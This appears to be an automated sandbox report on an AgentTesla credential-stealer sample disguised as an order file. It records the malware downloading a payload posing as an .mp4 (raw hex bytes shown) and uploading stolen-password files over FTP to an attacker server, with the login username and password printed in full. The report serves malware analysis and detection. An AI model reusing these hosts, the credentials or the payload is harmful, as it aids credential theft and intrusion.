Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 9, 2024 15:01:36.187109947 CEST | 50826 | 53 | 192.168.2.9 | 1.1.1.1
Oct 9, 2024 15:01:36.701447010 CEST | 53 | 50826 | 1.1.1.1 | 192.168.2.9
Oct 9, 2024 15:01:43.251147032 CEST | 52600 | 53 | 192.168.2.9 | 1.1.1.1
Oct 9, 2024 15:01:43.402820110 CEST | 53 | 52600 | 1.1.1.1 | 192.168.2.9

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 9, 2024 15:01:36.187109947 CEST | 192.168.2.9 | 1.1.1.1 | 0x506c | Standard query (0) | rubberpartsmanufacturers.com | A (IP address) | IN (0x0001) | false
Oct 9, 2024 15:01:43.251147032 CEST | 192.168.2.9 | 1.1.1.1 | 0xee61 | Standard query (0) | ftp.alternatifplastik.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 9, 2024 15:01:32.539725065 CEST | 1.1.1.1 | 192.168.2.9 | 0xdfd0 | No error (0) | shed.dual-low.s-part-0032.t-0009.t-msedge.net | azurefd-t-fb-prod.trafficmanager.net |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 9, 2024 15:01:32.539725065 CEST | 1.1.1.1 | 192.168.2.9 | 0xdfd0 | No error (0) | dual.s-part-0044.t-0009.fb-t-msedge.net | s-part-0044.t-0009.fb-t-msedge.net |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 9, 2024 15:01:32.539725065 CEST | 1.1.1.1 | 192.168.2.9 | 0xdfd0 | No error (0) | s-part-0044.t-0009.fb-t-msedge.net |  | 13.107.253.72 | A (IP address) | IN (0x0001) | false
Oct 9, 2024 15:01:36.701447010 CEST | 1.1.1.1 | 192.168.2.9 | 0x506c | No error (0) | rubberpartsmanufacturers.com |  | 103.191.208.122 | A (IP address) | IN (0x0001) | false
Oct 9, 2024 15:01:43.402820110 CEST | 1.1.1.1 | 192.168.2.9 | 0xee61 | No error (0) | ftp.alternatifplastik.com |  | 5.2.84.236 | A (IP address) | IN (0x0001) | false

• rubberpartsmanufacturers.com

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49727 | 103.191.208.122 | 443 | 7416 | C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-09 13:01:37 UTC | 98 | OUT | GET /manxz/Pqbrsrcnsx.mp4 HTTP/1.1
Host: rubberpartsmanufacturers.com
Connection: Keep-Alive
2024-10-09 13:01:38 UTC | 234 | IN | HTTP/1.1 200 OK
Date: Wed, 09 Oct 2024 13:01:38 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, close
Last-Modified: Wed, 09 Oct 2024 11:18:34 GMT
Accept-Ranges: bytes
Content-Length: 959504
Content-Type: video/mp4


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49818 | 103.191.208.122 | 443 | 7784 | C:\Users\user\AppData\Roaming\Fqhnalw.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-09 13:01:55 UTC | 98 | OUT | GET /manxz/Pqbrsrcnsx.mp4 HTTP/1.1
Host: rubberpartsmanufacturers.com
Connection: Keep-Alive
2024-10-09 13:01:56 UTC | 234 | IN | HTTP/1.1 200 OK
Date: Wed, 09 Oct 2024 13:01:56 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, close
Last-Modified: Wed, 09 Oct 2024 11:18:34 GMT
Accept-Ranges: bytes
Content-Length: 959504
Content-Type: video/mp4


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 49870 | 103.191.208.122 | 443 | 7972 | C:\Users\user\AppData\Roaming\Fqhnalw.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-09 13:02:03 UTC | 98 | OUT | GET /manxz/Pqbrsrcnsx.mp4 HTTP/1.1
Host: rubberpartsmanufacturers.com
Connection: Keep-Alive
2024-10-09 13:02:04 UTC | 234 | IN | HTTP/1.1 200 OK
Date: Wed, 09 Oct 2024 13:02:04 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, close
Last-Modified: Wed, 09 Oct 2024 11:18:34 GMT
Accept-Ranges: bytes
Content-Length: 959504
Content-Type: video/mp4
                                                            Data Ascii: ,QHWQD@SO&q6/9.[>My 6*mOS#m9`f "nHnp9<? (54zCJws\;<$2RVK7e@z-?Yh$Rf$A/K$ Ub>q.*$HOz>VBh&LmD<[m?
                                                            2024-10-09 13:02:04 UTC8000INData Raw: dd 01 b8 33 bb 76 d4 e0 a7 97 cb 81 3e 16 97 a7 00 a7 25 ae a7 d5 09 7c 1a 3c cf 7e bb b4 6d 71 72 24 dc e7 f3 6d 86 5c 58 f4 ed 8d 45 ca a1 f9 21 01 e1 5d ef ba a2 51 f8 bf ce 65 ff ca 52 a1 7a ab 15 81 95 ff 1a 61 a3 22 8a 5c f1 01 77 23 16 62 c6 a2 ae 01 63 17 b0 f6 23 e1 f2 c6 13 49 47 69 3a f2 54 40 b5 3d 67 20 4e 95 e1 4a 63 18 a8 47 39 83 d2 ed a2 fe 00 c0 ce e7 b0 0c 3d d5 9b 11 9b b8 63 56 19 ce 86 86 0f 8b 58 ee 07 e7 c0 33 a8 0b 75 fd c7 e0 fc 12 f4 6e d0 16 34 06 d3 29 3a 8f 0b 02 fd 6f fa f5 46 1f 5d 69 80 80 4a 18 78 96 d9 af 53 50 a1 da 49 3f 03 db c2 8f c8 86 cb aa 82 84 3b 77 25 9d 4b e0 74 f0 1e 60 16 13 08 17 f7 2d ce 1c 1b 9f dc 7d 9c 46 fb 26 2b 60 f0 59 15 03 f3 aa 6c 3a 6a 5d 09 c9 cf 3c 62 ba 5f fc 7f 73 69 5f 49 f0 1c 62 f5 19 da
                                                            Data Ascii: 3v>%|<~mqr$m\XE!]QeRza"\w#bc#IGi:T@=g NJcG9=cVX3un4):oF]iJxSPI?;w%Kt`-}F&+`Yl:j]<b_si_Ib
                                                            2024-10-09 13:02:04 UTC8000INData Raw: 95 56 61 0f 61 8f ce b9 86 30 8f fb 99 97 5e 84 b9 91 bb b0 20 17 48 12 3f 9d 40 e5 85 31 7d 29 be 90 c9 f3 72 3d 38 de be 52 fc 41 63 77 75 53 ac f5 6e 1a cb 40 f4 55 03 88 3f 89 a5 18 19 12 ec 3e 60 1d cd b3 05 fb 23 a0 5b 91 3b 2f 7c ff 14 28 99 8f df 38 db a5 ca 75 2b 76 33 17 27 4f 0a d1 6c fe 3c 76 aa 51 b3 e8 45 d1 ba fa cd 4f 48 17 5e 4f 68 57 31 2a 40 22 e2 4e df 55 83 bb 7e 5b 79 93 d1 51 cf 49 dd bd 60 60 4a b7 67 8a e5 33 a9 72 43 61 07 60 ff c7 55 6b 59 f9 a0 0c 9d 1e 31 70 2e 32 71 f1 e7 7b 8d 94 0d bb 29 6f ec a7 d9 91 4c ca c4 f7 8b 31 0d 54 29 cb 46 60 6a b2 8e 77 20 64 8a 20 d0 3f cb 94 41 08 a2 3f 97 eb 32 46 bc 69 14 98 d2 ab ed 09 4b bc 34 cc fe 75 70 c3 0d 6c 55 36 0e 29 64 2b bb 26 c1 7b 92 02 53 97 7b 68 96 0d d3 12 f8 9b 7f d0 3f
                                                            Data Ascii: Vaa0^ H?@1})r=8RAcwuSn@U?>`#[;/|(8u+v3'Ol<vQEOH^OhW1*@"NU~[yQI``Jg3rCa`UkY1p.2q{)oL1T)F`jw d ?A?2FiK4uplU6)d+&{S{h?
                                                            2024-10-09 13:02:04 UTC8000INData Raw: 3c bb ee c0 25 a7 cb 08 3c 34 bc b2 22 90 76 40 3d bb 29 7e 17 a5 a4 6b a7 fb d0 0c 06 5f 5c 60 ba eb 6c 59 13 8f f0 ed db 91 65 f9 b6 a6 26 9d 4d cf 4d 03 69 70 5a 9b ed 45 e3 fc 3e aa 38 5a e5 9a 0b e2 19 03 e8 11 af b8 81 2c a0 5c fd bd 6a db 2a 42 59 97 3b 9f 7e 63 47 a1 4a b6 8a f6 5b dc e5 9b 3b eb 3b c2 d4 df b7 e0 56 af 3f 08 94 fd e4 41 3a ae f3 1f 95 18 06 98 da 66 94 6c b2 dc 1b 96 9f a5 8f 6c 66 4e e8 e1 06 be 12 34 15 a9 4a f4 86 83 6a 20 00 df b9 96 a8 55 82 d8 0c 98 15 34 95 eb 44 78 05 d4 53 ea 2e 7e 6b fd 40 7f 71 a0 f6 45 aa 1e 31 b3 af c7 69 c4 02 6d 24 46 ef 59 ee 21 7b 7d 89 3f 97 58 12 81 f1 86 1b 49 b0 d1 c5 36 8e b6 1e 8c 5e db 21 f6 46 50 80 09 d2 bb 5d ae 4c 5d c4 9a 10 80 a1 a8 56 24 08 b6 b2 b0 e4 91 78 46 81 66 6e 80 8e c0 ac
                                                            Data Ascii: <%<4"v@=)~k_\`lYe&MMipZE>8Z,\j*BY;~cGJ[;;V?A:fllfN4Jj U4DxS.~k@qE1im$FY!{}?XI6^!FP]L]V$xFfn


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Oct 9, 2024 15:01:44.032128096 CEST | 21 | 49766 | 5.2.84.236 | 192.168.2.9 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
    220-You are user number 2 of 100 allowed.
    220-Local time is now 16:01. Server port: 21.
    220-This is a private system - No anonymous login
    220-IPv6 connections are also welcome on this server.
    220 You will be disconnected after 10 minutes of inactivity.
Oct 9, 2024 15:01:44.032381058 CEST | 49766 | 21 | 192.168.2.9 | 5.2.84.236 | USER fgghv@alternatifplastik.com
Oct 9, 2024 15:01:44.253540993 CEST | 21 | 49766 | 5.2.84.236 | 192.168.2.9 | 331 User fgghv@alternatifplastik.com OK. Password required
Oct 9, 2024 15:01:44.253741026 CEST | 49766 | 21 | 192.168.2.9 | 5.2.84.236 | PASS Fineboy777@
Oct 9, 2024 15:01:44.558885098 CEST | 21 | 49766 | 5.2.84.236 | 192.168.2.9 | 230 OK. Current restricted directory is /
Oct 9, 2024 15:01:44.779025078 CEST | 21 | 49766 | 5.2.84.236 | 192.168.2.9 | 504 Unknown command
Oct 9, 2024 15:01:44.779361010 CEST | 49766 | 21 | 192.168.2.9 | 5.2.84.236 | PWD
Oct 9, 2024 15:01:44.999363899 CEST | 21 | 49766 | 5.2.84.236 | 192.168.2.9 | 257 "/" is your current location
Oct 9, 2024 15:01:44.999527931 CEST | 49766 | 21 | 192.168.2.9 | 5.2.84.236 | TYPE I
Oct 9, 2024 15:01:45.221997023 CEST | 21 | 49766 | 5.2.84.236 | 192.168.2.9 | 200 TYPE is now 8-bit binary
Oct 9, 2024 15:01:45.222273111 CEST | 49766 | 21 | 192.168.2.9 | 5.2.84.236 | PASV
Oct 9, 2024 15:01:45.442713976 CEST | 21 | 49766 | 5.2.84.236 | 192.168.2.9 | 227 Entering Passive Mode (5,2,84,236,230,117)
Oct 9, 2024 15:01:45.449007034 CEST | 49766 | 21 | 192.168.2.9 | 5.2.84.236 | STOR PW_user-651689_2024_10_09_09_01_41.html
Oct 9, 2024 15:01:46.060630083 CEST | 21 | 49766 | 5.2.84.236 | 192.168.2.9 | 150 Accepted data connection
Oct 9, 2024 15:01:46.283751011 CEST | 21 | 49766 | 5.2.84.236 | 192.168.2.9 | 226-File successfully transferred
    226 0.224 seconds (measured here), 1.39 Kbytes per second
Oct 9, 2024 15:02:00.664175987 CEST | 21 | 49853 | 5.2.84.236 | 192.168.2.9 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
    220-You are user number 2 of 100 allowed.
    220-Local time is now 16:01. Server port: 21.
    220-This is a private system - No anonymous login
    220-IPv6 connections are also welcome on this server.
    220 You will be disconnected after 10 minutes of inactivity.
Oct 9, 2024 15:02:00.664474010 CEST | 49853 | 21 | 192.168.2.9 | 5.2.84.236 | USER fgghv@alternatifplastik.com
Oct 9, 2024 15:02:00.892010927 CEST | 21 | 49853 | 5.2.84.236 | 192.168.2.9 | 331 User fgghv@alternatifplastik.com OK. Password required
Oct 9, 2024 15:02:00.892241001 CEST | 49853 | 21 | 192.168.2.9 | 5.2.84.236 | PASS Fineboy777@
Oct 9, 2024 15:02:01.336200953 CEST | 21 | 49853 | 5.2.84.236 | 192.168.2.9 | 230 OK. Current restricted directory is /
Oct 9, 2024 15:02:01.564239025 CEST | 21 | 49853 | 5.2.84.236 | 192.168.2.9 | 504 Unknown command
Oct 9, 2024 15:02:01.564428091 CEST | 49853 | 21 | 192.168.2.9 | 5.2.84.236 | PWD
Oct 9, 2024 15:02:01.792363882 CEST | 21 | 49853 | 5.2.84.236 | 192.168.2.9 | 257 "/" is your current location
Oct 9, 2024 15:02:01.793025970 CEST | 49853 | 21 | 192.168.2.9 | 5.2.84.236 | TYPE I
Oct 9, 2024 15:02:02.020143032 CEST | 21 | 49853 | 5.2.84.236 | 192.168.2.9 | 200 TYPE is now 8-bit binary
Oct 9, 2024 15:02:02.020306110 CEST | 49853 | 21 | 192.168.2.9 | 5.2.84.236 | PASV
Oct 9, 2024 15:02:02.247364044 CEST | 21 | 49853 | 5.2.84.236 | 192.168.2.9 | 227 Entering Passive Mode (5,2,84,236,248,124)
Oct 9, 2024 15:02:02.253420115 CEST | 49853 | 21 | 192.168.2.9 | 5.2.84.236 | STOR PW_user-651689_2024_10_09_09_01_58.html
Oct 9, 2024 15:02:02.887054920 CEST | 21 | 49853 | 5.2.84.236 | 192.168.2.9 | 150 Accepted data connection
Oct 9, 2024 15:02:03.259938955 CEST | 21 | 49853 | 5.2.84.236 | 192.168.2.9 | 226-File successfully transferred
    226 0.228 seconds (measured here), 1.36 Kbytes per second
Oct 9, 2024 15:02:08.675556898 CEST | 21 | 49894 | 5.2.84.236 | 192.168.2.9 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
    220-You are user number 3 of 100 allowed.
    220-Local time is now 16:02. Server port: 21.
    220-This is a private system - No anonymous login
    220-IPv6 connections are also welcome on this server.
    220 You will be disconnected after 10 minutes of inactivity.
Oct 9, 2024 15:02:08.675856113 CEST | 49894 | 21 | 192.168.2.9 | 5.2.84.236 | USER fgghv@alternatifplastik.com
Oct 9, 2024 15:02:08.900168896 CEST | 21 | 49894 | 5.2.84.236 | 192.168.2.9 | 331 User fgghv@alternatifplastik.com OK. Password required
Oct 9, 2024 15:02:08.923407078 CEST | 49894 | 21 | 192.168.2.9 | 5.2.84.236 | PASS Fineboy777@
Oct 9, 2024 15:02:09.167845011 CEST | 21 | 49894 | 5.2.84.236 | 192.168.2.9 | 230 OK. Current restricted directory is /
Oct 9, 2024 15:02:09.394056082 CEST | 21 | 49894 | 5.2.84.236 | 192.168.2.9 | 504 Unknown command
Oct 9, 2024 15:02:09.394401073 CEST | 49894 | 21 | 192.168.2.9 | 5.2.84.236 | PWD
Oct 9, 2024 15:02:09.618685007 CEST | 21 | 49894 | 5.2.84.236 | 192.168.2.9 | 257 "/" is your current location
Oct 9, 2024 15:02:09.618923903 CEST | 49894 | 21 | 192.168.2.9 | 5.2.84.236 | TYPE I
Oct 9, 2024 15:02:09.844202995 CEST | 21 | 49894 | 5.2.84.236 | 192.168.2.9 | 200 TYPE is now 8-bit binary
Oct 9, 2024 15:02:09.844340086 CEST | 49894 | 21 | 192.168.2.9 | 5.2.84.236 | PASV
Oct 9, 2024 15:02:10.069533110 CEST | 21 | 49894 | 5.2.84.236 | 192.168.2.9 | 227 Entering Passive Mode (5,2,84,236,255,149)
Oct 9, 2024 15:02:10.076009035 CEST | 49894 | 21 | 192.168.2.9 | 5.2.84.236 | STOR PW_user-651689_2024_10_09_09_02_06.html
Oct 9, 2024 15:02:10.692442894 CEST | 21 | 49894 | 5.2.84.236 | 192.168.2.9 | 150 Accepted data connection
Oct 9, 2024 15:02:10.917622089 CEST | 21 | 49894 | 5.2.84.236 | 192.168.2.9 | 226-File successfully transferred
    226 0.225 seconds (measured here), 1.38 Kbytes per second

                                                            Target ID:0
                                                            Start time:09:01:34
                                                            Start date:09/10/2024
                                                            Path:C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe"
                                                            Imagebase:0xf70000
                                                            File size:39'936 bytes
                                                            MD5 hash:7EDAA96C807197B45FFB4F442AB3BFAA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1399224699.0000000004420000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1399224699.0000000004420000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1410088723.0000000006EA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1389741733.0000000003483000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1389741733.0000000003483000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1389741733.0000000003252000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1399224699.00000000044CF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1399224699.00000000044CF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:2
                                                            Start time:09:01:39
                                                            Start date:09/10/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                            Imagebase:0xa50000
                                                            File size:42'064 bytes
                                                            MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1561474335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.1561474335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.1570412470.0000000002DFE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1570412470.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.1570412470.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:4
                                                            Start time:09:01:52
                                                            Start date:09/10/2024
                                                            Path:C:\Users\user\AppData\Roaming\Fqhnalw.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Roaming\Fqhnalw.exe"
                                                            Imagebase:0xb80000
                                                            File size:39'936 bytes
                                                            MD5 hash:7EDAA96C807197B45FFB4F442AB3BFAA
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1566745789.0000000003125000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.1566745789.0000000003125000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1585499252.000000000417C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.1585499252.000000000417C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.1566745789.0000000002F02000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 32%, ReversingLabs
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:09:01:57
                                                            Start date:09/10/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                            Imagebase:0xe90000
                                                            File size:42'064 bytes
                                                            MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1655327124.00000000033BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1655327124.00000000033BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1655327124.00000000033FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:6
                                                            Start time:09:02:01
                                                            Start date:09/10/2024
                                                            Path:C:\Users\user\AppData\Roaming\Fqhnalw.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Roaming\Fqhnalw.exe"
                                                            Imagebase:0xc20000
                                                            File size:39'936 bytes
                                                            MD5 hash:7EDAA96C807197B45FFB4F442AB3BFAA
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1677808724.00000000042BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.1677808724.00000000042BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1653047795.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.1653047795.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000006.00000002.1653047795.0000000003042000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:7
                                                            Start time:09:02:05
                                                            Start date:09/10/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                            Imagebase:0xe90000
                                                            File size:42'064 bytes
                                                            MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2583924445.00000000031E7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2583924445.00000000031FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:moderate
                                                            Has exited:false


                                                              Execution Graph

                                                              Execution Coverage:11.5%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:7.2%
                                                              Total number of Nodes:529
                                                              Total number of Limit Nodes:55
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410303773.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f20000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4
                                                              • API String ID: 0-4088798008
                                                              • Opcode ID: 2ff68f8da6c61fc3544bfc531d0f273e40f67a4b3cf5023dfa438fbd644e8774
                                                              • Instruction ID: b3ffea7c489a805ab0d1b2a92f634e6449c27164dff8d7bbaca27e58f0697820
                                                              • Opcode Fuzzy Hash: 2ff68f8da6c61fc3544bfc531d0f273e40f67a4b3cf5023dfa438fbd644e8774
                                                              • Instruction Fuzzy Hash: 6CB2E374A00229CFDB94CFA8C994BADB7B6BF88700F158599E505AB3A5DB70DC81CF50

                                                              Control-flow Graph

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1409705268.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6dd0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 2
                                                              • API String ID: 0-450215437
                                                              • Opcode ID: da9c90c88d2fd6236d8c0c575b7a7328e6f26d8c801a579d0791189c12764fda
                                                              • Instruction ID: 4af04bac7fc60fc3dcc1bb37e28ce82754d5fd1d61dbb91ae8a375d992bd269d
                                                              • Opcode Fuzzy Hash: da9c90c88d2fd6236d8c0c575b7a7328e6f26d8c801a579d0791189c12764fda
                                                              • Instruction Fuzzy Hash: 05C2A0B4E002298FDB65DF68D884B9DBBB6FB89300F1081E9D509AB355DB309E85CF51

                                                              Control-flow Graph

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8
                                                              • API String ID: 0-4194326291
                                                              • Opcode ID: 58d8e492cce5cb2c0aef2c4487d90227374ee334972ea0b912edd20ab6690509
                                                              • Instruction ID: 8b1f3d5b22a8c73050308a8f67c953939e693e3bc18f5cf5522725eb7743696f
                                                              • Opcode Fuzzy Hash: 58d8e492cce5cb2c0aef2c4487d90227374ee334972ea0b912edd20ab6690509
                                                              • Instruction Fuzzy Hash: B142C171D006298BDB64DF69C850BD9B7B2BF89310F1486EAD50DBB251DB30AE85CF90
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410303773.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f20000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4
                                                              • API String ID: 0-4088798008
                                                              • Opcode ID: 65840fc4a84c086d6cfa366d5e5fce81a39891afd493cb3fc22acd1d4711953a
                                                              • Instruction ID: b9e7468a3439157f9b19203a3fe07606eb464551456c6eb77e5b3cb7525c199f
                                                              • Opcode Fuzzy Hash: 65840fc4a84c086d6cfa366d5e5fce81a39891afd493cb3fc22acd1d4711953a
                                                              • Instruction Fuzzy Hash: BF22E574E00229CFEBA4CFA4C994BADB7B2BF48700F148199D509AB3A5DB719D81CF51

                                                              Control-flow Graph

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410303773.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f20000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: y-3|
                                                              • API String ID: 0-2856238494
                                                              • Opcode ID: 68bd9287057a977a6dd03e5b37d9bf5510729c8b74cc03b1d0c78a9d2c33a419
                                                              • Instruction ID: d76f69015a5503d279485e2093b2b472cee26c324e6a553d837ce4c39545a59c
                                                              • Opcode Fuzzy Hash: 68bd9287057a977a6dd03e5b37d9bf5510729c8b74cc03b1d0c78a9d2c33a419
